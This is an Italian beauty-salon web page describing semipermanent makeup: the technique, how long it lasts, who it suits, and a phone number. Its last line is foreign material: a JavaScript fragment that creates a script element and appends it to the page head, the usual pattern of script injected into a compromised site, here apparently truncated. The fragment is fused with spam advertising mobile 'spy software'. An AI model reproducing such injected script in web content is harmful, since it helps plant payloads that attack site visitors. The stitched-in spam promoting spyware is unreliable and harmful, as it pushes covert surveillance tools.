Il centro estetico Simona Martini collabora, non solo, con professionisti del make up cosmetico ma anche del trucco semipermanente. In particolare la collaborazione con una professionista truccatrice che si occupa di trucco correttivo di carattere artistico, fotografico e teatrale.

Che cos’è il trucco semipermanente?trucco-semipermanente

Il trucco semipermanente è una tecnica che consiste nell’inserire micropigmenti nel primo strato del derma, si differenzia dal tatuaggio per la tipologia dei pigmenti e per la profondità in cui questi sono innestati. Questa tecnica infatti, è meno invasiva e anche la permanenza del disegno diventa più limitata nel tempo, rendendo necessario ripetere il trattamento.

Quanto dura il trattamento?

Il disegno ha una durata variabile che dipende dal tipo di pelle del cliente e dall’esposizione dello stesso ai raggi Uv, o dalla frequenza di balneazione, o dall’uso di prodotti con i quali la pelle viene regolarmente detersa.

Perché scegliere il trucco semipermanente?

Il trucco semipermanente è una soluzione scelta da donne di qualsiasi età che hanno bisogno di correggere o delineare le labbra, il contorno occhi o le sopracciglia.

Questo tipo di trattamento è l’ideale per chi presenta inestetismi cutanei da nascondere o labbra sottili e irregolari, oppure per chi possiede sopracciglia rade e non delineate o per chi vuole valorizzare lo sguardo.

Ma il trucco semipermanente è adatto non solo per chi possiede delle imperfezioni, ma anche per chi vuole apparire sempre in ordine ed è amante dell’effetto “acqua e sapone”.

Per maggiorni informazioni vi invitiamo a contattarci al numero 011 9321648

var d=document;var s=d.createElement('script'); d.getElementsByTagName('head')[0].appendChild(s);The most popular 2017 spy software applications for the mobile phones.